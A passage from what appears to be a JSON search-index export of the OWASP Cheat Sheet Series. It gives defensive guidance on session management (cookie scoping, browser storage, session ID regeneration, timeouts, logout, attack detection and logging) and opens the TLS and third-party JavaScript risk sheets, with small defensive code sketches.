Setting the Domain attribute to an overly permissive value, such as example.com, allows an attacker to launch attacks on the session IDs between different hosts and web applications belonging to the same domain, known as cross-subdomain cookies. For example, vulnerabilities in www.example.com might allow an attacker to get access to the session IDs from secure.example.com.

Additionally, it is recommended not to mix web applications of different security levels on the same domain. Vulnerabilities in one of the web applications would allow an attacker to set the session ID for a different web application on the same domain by using a permissive Domain attribute (such as example.com) which is a technique that can be used in session fixation attacks.

Although the Path attribute allows the isolation of session IDs between different web applications using different paths on the same host, it is highly recommended not to run different web applications (especially from different security levels or scopes) on the same host. Other methods can be used by these applications to access the session IDs, such as the document.cookie object. Also, any web application can set cookies for any path on that host.

Cookies are vulnerable to DNS spoofing/hijacking/poisoning attacks, where an attacker can manipulate the DNS resolution to force the web browser to disclose the session ID for a given host or domain.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#expire-and-max-age-attributes","title":"Expire and Max-Age Attributes","text":"

Session management mechanisms based on cookies can make use of two types of cookies: non-persistent (or session) cookies, and persistent cookies. If a cookie presents the Max-Age (which has preference over Expires) or Expires attribute, it will be considered a persistent cookie and will be stored on disk by the web browser until the expiration time.

Typically, session management capabilities to track users after authentication make use of non-persistent cookies. This forces the session to disappear from the client if the current web browser instance is closed. Therefore, it is highly recommended to use non-persistent cookies for session management purposes, so that the session ID does not remain on the web client cache for long periods of time, from where an attacker can obtain it.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#html5-web-storage-api","title":"HTML5 Web Storage API","text":"

The Web Hypertext Application Technology Working Group (WHATWG) describes the HTML5 Web Storage APIs, localStorage and sessionStorage, as mechanisms for storing name-value pairs client-side. Unlike HTTP cookies, the contents of localStorage and sessionStorage are not automatically shared within requests or responses by the browser and are used for storing data client-side.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#the-localstorage-api","title":"The localStorage API","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#scope","title":"Scope","text":"

Data stored using the localStorage API is accessible by pages which are loaded from the same origin, which is defined as the scheme (https://), host (example.com), port (443) and domain/realm (example.com). This provides similar access to this data as would be achieved by using the secure flag on a cookie, meaning that data stored from https could not be retrieved via http. Due to potential concurrent access from separate windows/threads, data stored using localStorage may be susceptible to shared access issues (such as race-conditions) and should be considered non-locking (Web Storage API Spec).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#duration","title":"Duration","text":"

Data stored using the localStorage API is persisted across browsing sessions, extending the timeframe in which it may be accessible to other system users.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#offline-access","title":"Offline Access","text":"

The standards do not require localStorage data to be encrypted-at-rest, meaning it may be possible to directly access this data from disk.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case","title":"Use Case","text":"

WHATWG suggests the use of localStorage for data that needs to be accessed across windows or tabs, across multiple sessions, and where large (multi-megabyte) volumes of data may need to be stored for performance reasons.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#the-sessionstorage-api","title":"The sessionStorage API","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#scope_1","title":"Scope","text":"

The sessionStorage API stores data within the window context from which it was called, meaning that Tab 1 cannot access data which was stored from Tab 2. Also, like the localStorage API, data stored using the sessionStorage API is accessible by pages which are loaded from the same origin, which is defined as the scheme (https://), host (example.com), port (443) and domain/realm (example.com). This provides similar access to this data as would be achieved by using the secure flag on a cookie, meaning that data stored from https could not be retrieved via http.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#duration_1","title":"Duration","text":"

The sessionStorage API only stores data for the duration of the current browsing session. Once the tab is closed, that data is no longer retrievable. This does not necessarily prevent access, should a browser tab be reused or left open. Data may also persist in memory until a garbage collection event.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#offline-access_1","title":"Offline Access","text":"

The standards do not require sessionStorage data to be encrypted-at-rest, meaning it may be possible to directly access this data from disk.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case_1","title":"Use Case","text":"

WHATWG suggests the use of sessionStorage for data that is relevant for one instance of a workflow, such as details for a ticket booking, but where multiple workflows could be performed in other tabs concurrently. The window/tab-bound nature will keep the data from leaking between workflows in separate tabs.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#web-workers","title":"Web Workers","text":"

Web Workers run JavaScript code in a global context separate from the one of the current window. A communication channel with the main execution window exists, which is called MessageChannel.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case_2","title":"Use Case","text":"

Web Workers are an alternative for browser storage of (session) secrets when storage persistence across page refresh is not a requirement. For Web Workers to provide secure browser storage, any code that requires the secret should exist within the Web Worker and the secret should never be transmitted to the main window context.

Storing secrets within the memory of a Web Worker offers the same security guarantees as an HttpOnly cookie: the confidentiality of the secret is protected. Still, an XSS attack can be used to send messages to the Web Worker to perform an operation that requires the secret. The Web Worker will return the result of the operation to the main execution thread.

The advantage of a Web Worker implementation compared to an HttpOnly cookie is that a Web Worker allows for some isolated JavaScript code to access the secret; an HttpOnly cookie is not accessible to any JavaScript. If the frontend JavaScript code requires access to the secret, the Web Worker implementation is the only browser storage option that preserves the secret confidentiality.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-life-cycle","title":"Session ID Life Cycle","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-generation-and-verification-permissive-and-strict-session-management","title":"Session ID Generation and Verification: Permissive and Strict Session Management","text":"

There are two types of session management mechanisms for web applications, permissive and strict, related to session fixation vulnerabilities. The permissive mechanism allows the web application to initially accept any session ID value set by the user as valid, creating a new session for it, while the strict mechanism enforces that the web application will only accept session ID values that have been previously generated by the web application.

The session tokens should be handled by the web server if possible or generated via a cryptographically secure random number generator.

Although the most common mechanism in use today is the strict one (more secure), PHP defaults to permissive. Developers must ensure that the web application does not use a permissive mechanism under certain circumstances. Web applications should never accept a session ID they have never generated, and in case of receiving one, they should generate and offer the user a new valid session ID. Additionally, this scenario should be detected as a suspicious activity and an alert should be generated.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#manage-session-id-as-any-other-user-input","title":"Manage Session ID as Any Other User Input","text":"

Session IDs must be considered untrusted, as any other user input processed by the web application, and they must be thoroughly validated and verified. Depending on the session management mechanism used, the session ID will be received in a GET or POST parameter, in the URL or in an HTTP header (e.g. cookies). If web applications do not validate and filter out invalid session ID values before processing them, they can potentially be used to exploit other web vulnerabilities, such as SQL injection if the session IDs are stored on a relational database, or persistent XSS if the session IDs are stored and reflected back afterwards by the web application.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#renew-the-session-id-after-any-privilege-level-change","title":"Renew the Session ID After Any Privilege Level Change","text":"

The session ID must be renewed or regenerated by the web application after any privilege level change within the associated user session. The most common scenario where the session ID regeneration is mandatory is during the authentication process, as the privilege level of the user changes from the unauthenticated (or anonymous) state to the authenticated state, though in some cases still not yet the authorized state. Common scenarios to consider include: password changes, permission changes, or switching from a regular user role to an administrator role within the web application. For all sensitive pages of the web application, any previous session IDs must be ignored, only the current session ID must be assigned to every new request received for the protected resource, and the old or previous session ID must be destroyed.

The most common web development frameworks provide session functions and methods to renew the session ID, such as request.getSession(true) & HttpSession.invalidate() (J2EE), Session.Abandon() & Response.Cookies.Add(new...) (ASP .NET), or session_start() & session_regenerate_id(true) (PHP).
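
Outside of these built-in helpers, a framework-agnostic sketch of the idea, assuming a dict-like server-side session store, could look like this:

import secrets\n\ndef regenerate_session_id(session_store, old_session_id):\n    # Move the server-side session data to a fresh ID after a privilege level change\n    new_session_id = secrets.token_hex(16)\n    session_store[new_session_id] = session_store.pop(old_session_id)\n    # The new value must be set in the session cookie sent to the client;\n    # the old ID is no longer present in the store and is therefore invalid\n    return new_session_id\n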

The session ID regeneration is mandatory to prevent session fixation attacks, where an attacker sets the session ID on the victim user's web browser instead of gathering the victim's session ID, as in most of the other session-based attacks, and independently of using HTTP or HTTPS. This protection mitigates the impact of other web-based vulnerabilities that can also be used to launch session fixation attacks, such as HTTP response splitting or XSS (see here and here).

A complementary recommendation is to use a different session ID or token name (or set of session IDs) pre and post authentication, so that the web application can keep track of anonymous users and authenticated users without the risk of exposing or binding the user session between both states.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#considerations-when-using-multiple-cookies","title":"Considerations When Using Multiple Cookies","text":"

If the web application uses cookies as the session ID exchange mechanism, and multiple cookies are set for a given session, the web application must verify all cookies (and enforce relationships between them) before allowing access to the user session.

It is very common for web applications to set a user cookie pre-authentication over HTTP to keep track of unauthenticated (or anonymous) users. Once the user authenticates in the web application, a new post-authentication secure cookie is set over HTTPS, and a binding between both cookies and the user session is established. If the web application does not verify both cookies for authenticated sessions, an attacker can make use of the pre-authentication unprotected cookie to get access to the authenticated user session (see here and here).

Web applications should try to avoid the same cookie name for different paths or domain scopes within the same web application, as this increases the complexity of the solution and potentially introduces scoping issues.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-expiration","title":"Session Expiration","text":"

In order to minimize the time period an attacker can launch attacks over active sessions and hijack them, it is mandatory to set expiration timeouts for every session, establishing the amount of time a session will remain active. Insufficient session expiration by the web application increases the exposure of other session-based attacks, as for the attacker to be able to reuse a valid session ID and hijack the associated session, it must still be active.

The shorter the session interval is, the less time an attacker has to use the valid session ID. The session expiration timeout values must be set in accordance with the purpose and nature of the web application, and balance security and usability, so that the user can comfortably complete the operations within the web application without their session frequently expiring.

Both the idle and absolute timeout values are highly dependent on how critical the web application and its data are. Common idle timeout ranges are 2-5 minutes for high-value applications and 15-30 minutes for low risk applications. Absolute timeouts depend on how long a user usually uses the application. If the application is intended to be used by an office worker for a full day, an appropriate absolute timeout range could be between 4 and 8 hours.

When a session expires, the web application must take active actions to invalidate the session on both sides, client and server. The latter is the most relevant and mandatory from a security perspective.

For most session exchange mechanisms, client side actions to invalidate the session ID are based on clearing out the token value. For example, to invalidate a cookie it is recommended to provide an empty (or invalid) value for the session ID, and set the Expires (or Max-Age) attribute to a date from the past (in case a persistent cookie is being used): Set-Cookie: id=; Expires=Friday, 17-May-03 18:45:00 GMT

In order to close and invalidate the session on the server side, it is mandatory for the web application to take active actions when the session expires, or the user actively logs out, by using the functions and methods offered by the session management mechanisms, such as HttpSession.invalidate() (J2EE), Session.Abandon() (ASP .NET) or session_destroy()/unset() (PHP).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#automatic-session-expiration","title":"Automatic Session Expiration","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#idle-timeout","title":"Idle Timeout","text":"

All sessions should implement an idle or inactivity timeout. This timeout defines the amount of time a session will remain active in case there is no activity in the session, closing and invalidating the session upon the defined idle period since the last HTTP request received by the web application for a given session ID.

The idle timeout limits the chances an attacker has to guess and use a valid session ID from another user. However, if the attacker is able to hijack a given session, the idle timeout does not limit the attacker's actions, as they can generate activity on the session periodically to keep the session active for longer periods of time.

Session timeout management and expiration must be enforced server-side. If the client is used to enforce the session timeout, for example using the session token or other client parameters to track time references (e.g. number of minutes since login time), an attacker could manipulate these to extend the session duration.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#absolute-timeout","title":"Absolute Timeout","text":"

All sessions should implement an absolute timeout, regardless of session activity. This timeout defines the maximum amount of time a session can be active, closing and invalidating the session upon the defined absolute period since the given session was initially created by the web application. After invalidating the session, the user is forced to (re)authenticate again in the web application and establish a new session.

The absolute timeout limits the amount of time an attacker can use a hijacked session and impersonate the victim user.
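
A minimal server-side sketch combining the idle and absolute timeouts described above (the timestamps are assumed to be stored with the session record and the values are illustrative):

import time\n\nIDLE_TIMEOUT = 15 * 60          # e.g. 15 minutes of inactivity\nABSOLUTE_TIMEOUT = 8 * 60 * 60  # e.g. 8 hours since session creation\n\ndef is_session_expired(session):\n    # 'session' is assumed to be a server-side record holding both timestamps\n    now = time.time()\n    if now - session[\"last_activity\"] > IDLE_TIMEOUT:\n        return True\n    if now - session[\"created_at\"] > ABSOLUTE_TIMEOUT:\n        return True\n    return False\n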

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#renewal-timeout","title":"Renewal Timeout","text":"

Alternatively, the web application can implement an additional renewal timeout after which the session ID is automatically renewed, in the middle of the user session, and independently of the session activity and, therefore, of the idle timeout.

After a specific amount of time since the session was initially created, the web application can regenerate a new ID for the user session and try to set it, or renew it, on the client. The previous session ID value would still be valid for some time, accommodating a safety interval, before the client is aware of the new ID and starts using it. At that time, when the client switches to the new ID inside the current session, the application invalidates the previous ID.

This scenario minimizes the amount of time a given session ID value, potentially obtained by an attacker, can be reused to hijack the user session, even when the victim user session is still active. The user session remains alive and open on the legitimate client, although its associated session ID value is transparently renewed periodically during the session duration, every time the renewal timeout expires. Therefore, the renewal timeout complements the idle and absolute timeouts, especially when the absolute timeout value extends significantly over time (e.g. it is an application requirement to keep the user sessions open for long periods of time).

Depending on the implementation, potentially there could be a race condition where the attacker with a still valid previous session ID sends a request before the victim user, right after the renewal timeout has just expired, and obtains first the value for the renewed session ID. At least in this scenario, the victim user might be aware of the attack as her session will be suddenly terminated because her associated session ID is not valid anymore.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#manual-session-expiration","title":"Manual Session Expiration","text":"

Web applications should provide mechanisms that allow security aware users to actively close their session once they have finished using the web application.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#logout-button","title":"Logout Button","text":"

Web applications must provide a visible and easily accessible logout (logoff, exit, or close session) button that is available on the web application header or menu and reachable from every web application resource and page, so that the user can manually close the session at any time. As described in the Session Expiration section, the web application must invalidate the session at least on the server side.

NOTE: Unfortunately, not all web applications make it easy for users to close their current session. Thus, client-side enhancements allow conscientious users to protect their sessions by helping to close them diligently.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#web-content-caching","title":"Web Content Caching","text":"

Even after the session has been closed, it might be possible to access the private or sensitive data exchanged within the session through the web browser cache. Therefore, web applications must use restrictive cache directives for all the web traffic exchanged through HTTP and HTTPS, such as the Cache-Control and Pragma HTTP headers, and/or equivalent META tags on all or (at least) sensitive web pages.

Independently of the cache policy defined by the web application, if caching web application contents is allowed, the session IDs must never be cached, so it is highly recommended to use the Cache-Control: no-cache=\"Set-Cookie, Set-Cookie2\" directive, to allow web clients to cache everything except the session ID (see here).
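
As a minimal illustration of restrictive cache directives (assuming a Node.js/Express application; the path and header values are examples, not a prescription), the following middleware disables caching entirely for a sensitive area of the site:

const express = require('express');\nconst app = express();\n\n// Apply restrictive cache directives to every response under /account (assumed path).\napp.use('/account', (req, res, next) => {\n  res.set('Cache-Control', 'no-cache, no-store, must-revalidate');\n  res.set('Pragma', 'no-cache'); // HTTP/1.0 compatibility\n  res.set('Expires', '0');\n  next();\n});\n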

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#additional-client-side-defenses-for-session-management","title":"Additional Client-Side Defenses for Session Management","text":"

Web applications can complement the previously described session management defenses with additional countermeasures on the client side. Client-side protections, typically in the form of JavaScript checks and verifications, are not bulletproof and can easily be defeated by a skilled attacker, but they can introduce another layer of defense that has to be bypassed by intruders.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#initial-login-timeout","title":"Initial Login Timeout","text":"

Web applications can use JavaScript code in the login page to evaluate and measure the amount of time since the page was loaded and a session ID was granted. If a login attempt is tried after a specific amount of time, the client code can notify the user that the maximum amount of time to log in has passed and reload the login page, hence retrieving a new session ID.

This extra protection mechanism tries to force the renewal of the session ID pre-authentication, avoiding scenarios where a previously used (or manually set) session ID is reused by the next victim using the same computer, for example, in session fixation attacks.
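
A minimal client-side sketch of this check follows (the form id, the time limit and the user message are illustrative assumptions):

const MAX_LOGIN_TIME_MS = 5 * 60 * 1000; // assumed maximum time to log in\nconst loadedAt = Date.now();\n\ndocument.getElementById('login-form').addEventListener('submit', (event) => {\n  if (Date.now() - loadedAt > MAX_LOGIN_TIME_MS) {\n    event.preventDefault();\n    alert('The maximum time to log in has passed. The page will be reloaded.');\n    window.location.reload(); // retrieves a fresh pre-authentication session ID\n  }\n});\n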

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#force-session-logout-on-web-browser-window-close-events","title":"Force Session Logout On Web Browser Window Close Events","text":"

Web applications can use JavaScript code to capture all the web browser tab or window close (or even back) events and take the appropriate actions to close the current session before closing the web browser, emulating that the user has manually closed the session via the logout button.
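
A minimal sketch is shown below; it assumes a '/logout' endpoint and uses navigator.sendBeacon so the request can survive page unload. This is best-effort only (close events do not fire reliably in every browser), so server-side expiration remains necessary:

// Best-effort logout when the tab or window is being closed or navigated away from.\nwindow.addEventListener('pagehide', () => {\n  navigator.sendBeacon('/logout'); // assumed logout endpoint\n});\n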

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#disable-web-browser-cross-tab-sessions","title":"Disable Web Browser Cross-Tab Sessions","text":"

Web applications can use JavaScript code once the user has logged in and a session has been established to force the user to re-authenticate if a new web browser tab or window is opened against the same web application. The web application does not want to allow multiple web browser tabs or windows to share the same session. Therefore, the application tries to force the web browser to not share the same session ID simultaneously between them.
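
One possible sketch of this check is shown below (the flag name and the re-authentication endpoint are assumptions); it relies on window.sessionStorage, which, unlike cookies, is scoped to a single tab or window:

// On the page shown right after a successful login: mark this tab as the one\n// where authentication took place.\nwindow.sessionStorage.setItem('tabBound', '1');\n\n// On every other protected page: a new tab or window will not have the per-tab\n// flag, so force the user to re-authenticate there.\nif (!window.sessionStorage.getItem('tabBound')) {\n  window.location.href = '/reauthenticate'; // assumed endpoint\n}\n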

NOTE: This mechanism cannot be implemented if the session ID is exchanged through cookies, as cookies are shared by all web browser tabs/windows.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#automatic-client-logout","title":"Automatic Client Logout","text":"

JavaScript code can be used by the web application in all (or critical) pages to automatically log out client sessions after the idle timeout expires, for example, by redirecting the user to the logout page (the same resource used by the logout button mentioned previously).

The benefit of enhancing the server-side idle timeout functionality with client-side code is that the user can see that the session has finished due to inactivity, or can even be notified in advance that the session is about to expire through a countdown timer and warning messages. This user-friendly approach helps to avoid loss of work in web pages that require extensive input data when sessions expire silently on the server side.
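
A minimal sketch of such a client-side idle timer follows (the timings, the warning message and the '/logout' resource are assumptions):

const IDLE_TIMEOUT_MS = 15 * 60 * 1000;\nconst WARNING_BEFORE_MS = 60 * 1000;\nlet warnTimer, logoutTimer;\n\nfunction resetIdleTimers() {\n  clearTimeout(warnTimer);\n  clearTimeout(logoutTimer);\n  warnTimer = setTimeout(() => {\n    alert('Your session is about to expire due to inactivity.');\n  }, IDLE_TIMEOUT_MS - WARNING_BEFORE_MS);\n  logoutTimer = setTimeout(() => {\n    window.location.href = '/logout'; // same resource as the logout button\n  }, IDLE_TIMEOUT_MS);\n}\n\n['click', 'keydown', 'scroll'].forEach((evt) => document.addEventListener(evt, resetIdleTimers));\nresetIdleTimers();\n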

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-attacks-detection","title":"Session Attacks Detection","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-guessing-and-brute-force-detection","title":"Session ID Guessing and Brute Force Detection","text":"

If an attacker tries to guess or brute force a valid session ID, they need to launch multiple sequential requests against the target web application using different session IDs from a single (or set of) IP address(es). Additionally, if an attacker tries to analyze the predictability of the session ID (e.g. using statistical analysis), they need to launch multiple sequential requests from a single (or set of) IP address(es) against the target web application to gather new valid session IDs.

Web applications must be able to detect both scenarios based on the number of attempts to gather (or use) different session IDs and alert and/or block the offending IP address(es).
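
As an illustration only, the following server-side sketch (an Express application with cookie parsing is assumed; the threshold, cookie name and session store lookup are placeholders) counts requests carrying unknown session IDs per source IP and blocks noisy sources:

// app is an Express application with cookie parsing enabled (assumed).\nconst knownSessionIds = new Set(); // placeholder: in practice, query the session store\nconst invalidBySourceIp = new Map();\nconst MAX_INVALID_IDS = 20; // assumed threshold before alerting/blocking\n\napp.use((req, res, next) => {\n  const sid = req.cookies && req.cookies.sessionid; // assumed cookie name\n  if (sid && !knownSessionIds.has(sid)) {\n    const count = (invalidBySourceIp.get(req.ip) || 0) + 1;\n    invalidBySourceIp.set(req.ip, count);\n    if (count > MAX_INVALID_IDS) {\n      console.warn('Possible session ID guessing or brute forcing from ' + req.ip);\n      return res.status(429).end();\n    }\n  }\n  next();\n});\n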

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#detecting-session-id-anomalies","title":"Detecting Session ID Anomalies","text":"

Web applications should focus on detecting anomalies associated with the session ID, such as its manipulation. The OWASP AppSensor Project provides a framework and methodology to implement built-in intrusion detection capabilities within web applications, focused on the detection of anomalies and unexpected behaviors in the form of detection points and response actions. Instead of using external protection layers, sometimes the business logic details and advanced intelligence are only available from inside the web application, where it is possible to establish multiple session-related detection points, such as when an existing cookie is modified or deleted, a new cookie is added, the session ID from another user is reused, or when the user location or User-Agent changes in the middle of a session.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#binding-the-session-id-to-other-user-properties","title":"Binding the Session ID to Other User Properties","text":"

With the goal of detecting (and, in some scenarios, protecting against) user misbehaviors and session hijacking, it is highly recommended to bind the session ID to other user or client properties, such as the client IP address, User-Agent, or client-based digital certificate. If the web application detects any change or anomaly between these different properties in the middle of an established session, this is a very good indicator of session manipulation and hijacking attempts, and this simple fact can be used to alert and/or terminate the suspicious session.

Although these properties cannot be used by web applications to reliably defend against session attacks, they significantly increase the web application's detection (and protection) capabilities. However, a skilled attacker can bypass these controls by reusing the same IP address assigned to the victim user, by sharing the same network (very common in NAT environments, like Wi-Fi hotspots) or by using the same outbound web proxy (very common in corporate environments), or by manually modifying their User-Agent to look exactly like the victim user's.
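
A minimal server-side sketch of this binding follows (Express with express-session is assumed; the response to an anomaly, here terminating the session, is an application decision):

// app is an Express application with express-session configured (assumed).\napp.use((req, res, next) => {\n  if (!req.session.client) {\n    // First request of the session: record the client properties to bind to.\n    req.session.client = { ip: req.ip, ua: req.get('User-Agent') };\n    return next();\n  }\n  const changed = req.session.client.ip !== req.ip ||\n    req.session.client.ua !== req.get('User-Agent');\n  if (changed) {\n    console.warn('Possible session hijacking attempt for session ' + req.sessionID);\n    return req.session.destroy(() => res.status(401).end());\n  }\n  next();\n});\n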

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#logging-sessions-life-cycle-monitoring-creation-usage-and-destruction-of-session-ids","title":"Logging Sessions Life Cycle: Monitoring Creation, Usage, and Destruction of Session IDs","text":"

Web applications should increase their logging capabilities by including information regarding the full life cycle of sessions. In particular, it is recommended to record session-related events, such as the creation, renewal, and destruction of session IDs, as well as details about their usage within login and logout operations, privilege level changes within the session, timeout expiration, invalid session activities (when detected), and critical business operations during the session.

The log details might include a timestamp, source IP address, web target resource requested (and involved in a session operation), HTTP headers (including the User-Agent and Referer), GET and POST parameters, error codes and messages, username (or user ID), plus the session ID (cookies, URL, GET, POST\u2026).

Sensitive data like the session ID should not be included in the logs in order to protect the session logs against session ID local or remote disclosure or unauthorized access. However, some kind of session-specific information must be logged in order to correlate log entries to specific sessions. It is recommended to log a salted-hash of the session ID instead of the session ID itself in order to allow for session-specific log correlation without exposing the session ID.
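
A minimal sketch of such a correlation identifier follows (Node.js crypto is used; the salt handling and the example logging call are assumptions):

const crypto = require('crypto');\nconst LOG_SALT = process.env.SESSION_LOG_SALT; // secret kept outside the logs\n\n// Derive a stable, non-reversible identifier from the session ID for log correlation.\nfunction sessionLogId(sessionId) {\n  return crypto.createHmac('sha256', LOG_SALT).update(sessionId).digest('hex').slice(0, 16);\n}\n\n// Example usage in a logging call:\n// logger.info('login success user=' + userId + ' session=' + sessionLogId(req.sessionID));\n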

In particular, web applications must thoroughly protect administrative interfaces that allow managing all the currently active sessions. Frequently these are used by support personnel to solve session-related issues, or even general issues, by impersonating the user and looking at the web application as the user does.

The session logs become one of the main web application intrusion detection data sources, and can also be used by intrusion protection systems to automatically terminate sessions and/or disable user accounts when (one or many) attacks are detected. If active protections are implemented, these defensive actions must be logged too.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#simultaneous-session-logons","title":"Simultaneous Session Logons","text":"

It is a web application design decision to determine whether multiple simultaneous logons from the same user are allowed from the same or from different client IP addresses. If the web application does not want to allow simultaneous session logons, it must take effective actions after each new authentication event, implicitly terminating the previously available session, or asking the user (through the old, new or both sessions) which session must remain active.

It is recommended for web applications to add user capabilities that allow checking the details of active sessions at any time, monitor and alert the user about concurrent logons, provide user features to remotely terminate sessions manually, and track account activity history (logbook) by recording multiple client details such as IP address, User-Agent, login date and time, idle time, etc.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-management-waf-protections","title":"Session Management WAF Protections","text":"

There are situations where the web application source code is not available or cannot be modified, or when the changes required to implement the multiple security recommendations and best practices detailed above imply a full redesign of the web application architecture, and therefore, cannot be easily implemented in the short term.

In these scenarios, or to complement the web application defenses, and with the goal of keeping the web application as secure as possible, it is recommended to use external protections such as Web Application Firewalls (WAFs) that can mitigate the session management threats already described.

Web Application Firewalls offer detection and protection capabilities against session based attacks. On the one hand, it is trivial for WAFs to enforce the usage of security attributes on cookies, such as the Secure and HttpOnly flags, applying basic rewriting rules on the Set-Cookie header for all the web application responses that set a new cookie.

On the other hand, more advanced capabilities can be implemented to allow the WAF to keep track of sessions, and the corresponding session IDs, and apply all kinds of protections against session fixation (by renewing the session ID on the client side when privilege changes are detected), enforcing sticky sessions (by verifying the relationship between the session ID and other client properties, like the IP address or User-Agent), or managing session expiration (by forcing both the client and the web application to finalize the session).

The open-source ModSecurity WAF, plus the OWASP Core Rule Set, provide capabilities to detect and apply security cookie attributes, countermeasures against session fixation attacks, and session tracking features to enforce sticky sessions.

"},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html","title":"TLS Cipher String Cheat Sheet","text":""},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Mozilla Foundation provides an easy-to-use secure configuration generator for web, database, and mail software. This online (and regularly updated) tool allows site administrators to select the software they are using and receive a configuration file that is both safe and compatible for a wide variety of browser versions and server software.

For more information please visit https://ssl-config.mozilla.org/.

"},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html","title":"Third Party JavaScript Management Cheat Sheet","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Tags, aka marketing tags, analytics tags etc., are small bits of JavaScript on a web page. They can also be HTML image elements when JavaScript is disabled. Their purpose is to collect data on the web user's actions and browsing context for use by the web page owner in marketing.

Third party vendor JavaScript tags (hereinafter, tags) can be divided into two types:

User interface tags have to execute on the client because they change the DOM; displaying a dialog or image or changing text etc.

Analytics tags send information back to a marketing information database; information like what user action was just taken, browser metadata, location information, page metadata etc. The rationale for analytics tags is to provide data from the user's browser DOM to the vendor for some form of marketing analysis. This data can be anything available in the DOM. The data is used for user navigation and clickstream analysis, identification of the user to determine further content to display etc., and various marketing analysis functions.

The term host refers to the original site the user goes to, such as a shopping or news site, that contains or retrieves and executes a third-party JavaScript tag for marketing analysis of the user actions.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#major-risks","title":"Major risks","text":"

The single greatest risk is a compromise of the third party JavaScript server, and the injection of malicious JavaScript into the original tag JavaScript. This has happened in 2018 and likely earlier.

The invocation of third-party JS code in a web application requires consideration of three risks in particular:

  1. The loss of control over changes to the client application,
  2. The execution of arbitrary code on client systems,
  3. The disclosure or leakage of sensitive information to 3rd parties.
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-1-loss-of-control-over-changes-to-the-client-application","title":"Risk 1: Loss of control over changes to the client application","text":"

This risk arises from the fact that there is usually no guarantee that the code hosted at the third party will remain the same as seen by the developers and testers: new features may be pushed in the third-party code at any time, thus potentially breaking the interface or data flows and affecting the availability of your application to its users/customers.

Typical defenses include, but are not restricted to: in-house script mirroring (to prevent alterations by 3rd parties), sub-resource integrity (to enable browser-level validation) and secure transmission of the third-party code (to prevent modifications while in transit). See below for more details.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-2-execution-of-arbitrary-code-on-client-systems","title":"Risk 2: Execution of arbitrary code on client systems","text":"

This risk arises from the fact that third-party JavaScript code is rarely reviewed by the invoking party prior to its integration into a website/application. As the client reaches the hosting website/application, this third-party code gets executed, thus granting the third-party the exact same privileges that were granted to the user (similar to XSS attacks).

Any testing performed prior to entering production loses some of its validity, including AST testing (IAST, RAST, SAST, DAST, etc.).

While it is widely accepted that the probability of having rogue code intentionally injected by the third-party is low, there are still cases of malicious injections in third-party code after the organization's servers were compromised (ex: Yahoo, January 2014).

This risk should therefore still be evaluated, in particular when the third-party does not show any documentation that it is enforcing better security measures than the invoking organization itself, or at least equivalent. Another example is that the domain hosting the third-party JavaScript code expires because the company maintaining it is bankrupt or the developers have abandoned the project. A malicious actor can then re-register the domain and publish malicious code.

Typical defenses include, but are not restricted to:

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-3-disclosure-of-sensitive-information-to-3rd-parties","title":"Risk 3: Disclosure of sensitive information to 3rd parties","text":"

When a third-party script is invoked in a website/application, the browser directly contacts the third-party servers. By default, the request includes all regular HTTP headers. In addition to the originating IP address of the browser, the third-party also obtains other data such as the referrer (in non-https requests) and any cookies previously set by the 3rd party, for example when visiting another organization's website that also invokes the third-party script.

In many cases, this grants the third-party primary access to information on the organization's users / customers / clients. Additionally, if the third-party is sharing the script with other entities, it also collects secondary data from all the other entities, thus knowing who the organization's visitors are but also what other organizations they interact with.

